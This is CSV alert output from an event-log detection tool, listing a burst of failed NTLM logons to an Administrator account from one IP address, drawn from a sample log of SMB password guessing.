2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
